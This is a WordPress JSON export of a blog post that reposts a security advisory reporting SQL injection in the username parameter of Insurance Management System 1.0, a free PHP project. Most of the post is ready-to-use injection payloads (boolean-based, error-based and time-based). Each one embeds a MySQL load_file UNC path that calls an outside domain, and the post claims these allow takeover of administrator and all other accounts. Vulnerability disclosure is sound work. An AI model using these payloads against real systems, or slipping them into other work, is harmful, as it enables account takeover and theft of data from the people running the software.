{"id":21731,"date":"2022-03-15T00:59:56","date_gmt":"2022-03-14T21:59:56","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166286\/insurancemgmtsys10-sql.txt"},"modified":"2022-03-15T14:27:06","modified_gmt":"2022-03-15T10:57:06","slug":"insurance-management-system-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/insurance-management-system-1-0-sql-injection\/","title":{"rendered":"Insurance Management System 1.0 SQL Injection"},"content":{"rendered":"

## Title: Insurance Management System v1.0 SQLi
\n## Author: nu11secur1ty
\n## Date: 03.12.2022
\n## Vendor: https:\/\/itsourcecode.com\/free-projects\/php-project\/php-projects-source-code-free-downloads\/
\n## Software: https:\/\/itsourcecode.com\/free-projects\/php-project\/insurance-management-system-project-in-php-free-download\/
\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/upload\/main\/vendors\/itsourcecode.com\/Insurance-Management-System<\/p>\n

## Description:
\nThe username parameter appears to be vulnerable to SQL injection
\nattacks. The payload ‘+(select
\nload_file(‘\\\\\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com\/free-projects\/php-project\/insurance-management-system-project-in-php-free-download\/\\\\xek’))+’
\nwas submitted in the username parameter.
\nThis payload injects a SQL sub-query that calls MySQL’s load_file
\nfunction with a UNC file path that references a URL on an external
\ndomain.
\nThe application interacted with that domain, indicating that the
\ninjected SQL query was executed.
\nThe attacker can take administrator account control and also of all
\naccounts on this system, also the malicious user can download all
\ninformation about this system.<\/p>\n

Status: CRITICAL<\/p>\n

[+] Payloads:<\/p>\n

“`mysql
\n—
\nParameter: username (POST)
\nType: boolean-based blind
\nTitle: AND boolean-based blind – WHERE or HAVING clause (subquery – comment)
\nPayload: username=GvWNfNIz’+(select
\nload_file(‘\\\\\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com\/free-projects\/php-project\/insurance-management-system-project-in-php-free-download\/\\\\xek’))+”
\nAND 7122=(SELECT (CASE WHEN (7122=7122) THEN 7122 ELSE (SELECT 6385
\nUNION SELECT 2068) END))– -&password=y6E!b3n!T9<\/p>\n

Type: error-based
\nTitle: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or
\nGROUP BY clause (FLOOR)
\nPayload: username=GvWNfNIz’+(select
\nload_file(‘\\\\\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com\/free-projects\/php-project\/insurance-management-system-project-in-php-free-download\/\\\\xek’))+”
\nAND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x7178767671,(SELECT
\n(ELT(3405=3405,1))),0x7178627871,FLOOR(RAND(0)*2))x FROM
\nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– zJzm&password=y6E!b3n!T9<\/p>\n

Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: username=GvWNfNIz’+(select
\nload_file(‘\\\\\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com\/free-projects\/php-project\/insurance-management-system-project-in-php-free-download\/\\\\xek’))+”
\nAND (SELECT 5739 FROM (SELECT(SLEEP(5)))crqV)–
\npBFE&password=y6E!b3n!T9
\n—<\/p>\n

“`<\/p>\n

## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/upload\/main\/vendors\/itsourcecode.com\/Insurance-Management-System)<\/p>\n

## Proof and Exploit:
\n[href](https:\/\/streamable.com\/iyml42)<\/p>\n","protected":false},"excerpt":{"rendered":"

## Title: Insurance Management System v1.0 SQLi ## Author: nu11secur1ty ## Date: 03.12.2022 ## Vendor: https:\/\/itsourcecode.com\/free-projects\/php-project\/php-projects-source-code-free-downloads\/ ## Software: https:\/\/itsourcecode.com\/free-projects\/php-project\/insurance-management-system-project-in-php-free-download\/ ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/upload\/main\/vendors\/itsourcecode.com\/Insurance-Management-System ## Description: The username parameter appears to be vulnerable to SQL injection attacks. The payload ‘+(select load_file(‘\\\\\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com\/free-projects\/php-project\/insurance-management-system-project-in-php-free-download\/\\\\xek’))+’ was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL’s load_file …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21731","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21731","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21731"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21731\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21731"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21731"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21731"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}